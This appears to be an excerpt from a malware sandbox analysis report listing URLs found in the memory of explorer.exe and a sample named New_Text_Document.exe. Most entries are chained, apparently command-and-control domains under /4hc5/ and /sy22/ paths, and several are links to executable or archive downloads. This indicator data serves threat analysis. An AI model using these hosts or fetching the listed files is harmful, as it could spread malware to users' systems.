                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iontrapper.science
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iontrapper.science/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iontrapper.science/4hc5/www.showshoe.info
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iontrapper.scienceReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqixuehe.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqixuehe.com/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqixuehe.com/4hc5/www.wzmatics.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqixuehe.comReferer:
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.kalp-s.com/wp-admin/MILAHAJOBFFO2308200014BLONEYSH3AK1112700DOCUMENTSFOR40222PKGSAND54620
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kimgj.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kimgj.com/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kimgj.com/sy22/www.kjnala.shop
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kimgj.comReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kjnala.shop
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kjnala.shop/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kjnala.shop/sy22/www.thwmlohr.click
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kjnala.shopReferer:
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ks.cn/kss/c113124/202105/cad26105a78b4ba6b3e63b79760539d5/files/fc8edf706344462ab7b600ae2
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leontellez.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leontellez.com/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leontellez.com/sy22/www.trishpintar.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leontellez.comReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.loadtransfer.site
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.loadtransfer.site/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.loadtransfer.site/4hc5/P
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.loadtransfer.siteReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lpqxmz.site
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lpqxmz.site/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lpqxmz.site/4hc5/www.peakvitality.fitness
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lpqxmz.siteReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.matsuri-jujutsukaisen.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.matsuri-jujutsukaisen.com/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.matsuri-jujutsukaisen.com/4hc5/www.bakepreneurs.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.matsuri-jujutsukaisen.comReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oliwas.xyz
                    Source: explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oliwas.xyz/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oliwas.xyzReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omclaval.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omclaval.com/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omclaval.com/sy22/www.oliwas.xyz
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omclaval.comReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pathlightpropertiesmgt.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pathlightpropertiesmgt.com/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pathlightpropertiesmgt.com/4hc5/www.tcbbuilds.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pathlightpropertiesmgt.comReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.peakvitality.fitness
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.peakvitality.fitness/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.peakvitality.fitness/4hc5/www.pathlightpropertiesmgt.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.peakvitality.fitnessReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quailrun-inc.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quailrun-inc.com/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quailrun-inc.com/4hc5/www.iontrapper.science
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quailrun-inc.comReferer:
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.reifenquick.de/Scripts/FILE/21mnqlvi/oz88535657v7rbazasyth9x8i/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.reifenquick.de/Scripts/hl8-8w4cs-6325/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.reifenquick.de/Scripts/open-0627720493640-azQ24PfFjRm/guarded-space/gxkx9t42ra6yf-6x7uyx3
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.reifenquick.de/Scripts/statement/ul397wfyb/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.reiwo-service.de/cgi-bin/O/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sarthaksrishticreation.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sarthaksrishticreation.com/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sarthaksrishticreation.com/sy22/www.vistcreative.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sarthaksrishticreation.comReferer:
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com/pro/dl/qywfr3
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.showshoe.info
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.showshoe.info/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.showshoe.info/4hc5/www.iqixuehe.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.showshoe.infoReferer:
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.starcountry.net/screenmate/cute/sm1302.zip
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcbbuilds.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcbbuilds.com/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcbbuilds.com/4hc5/www.matsuri-jujutsukaisen.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcbbuilds.comReferer:
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.teknoarge.com/update/ana/Update.exe
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thwmlohr.click
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thwmlohr.click/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thwmlohr.click/sy22/www.fourseasonslb.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thwmlohr.clickReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.travisline.pro
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.travisline.pro/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.travisline.pro/sy22/www.omclaval.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.travisline.proReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trishpintar.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trishpintar.com/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trishpintar.com/sy22/www.travisline.pro
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trishpintar.comReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uadmxqby.click
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uadmxqby.click/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uadmxqby.click/sy22/www.leontellez.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uadmxqby.clickReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vaskaworldairways.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vaskaworldairways.com/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vaskaworldairways.com/sy22/www.kimgj.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vaskaworldairways.comReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vistcreative.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vistcreative.com/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vistcreative.com/sy22/www.uadmxqby.click
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vistcreative.comReferer:
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.websound.ru/issues/136_140/flt_shovemydiscoupyourarse.exe
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wzmatics.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wzmatics.com/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wzmatics.com/4hc5/www.checktrace.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wzmatics.comReferer:
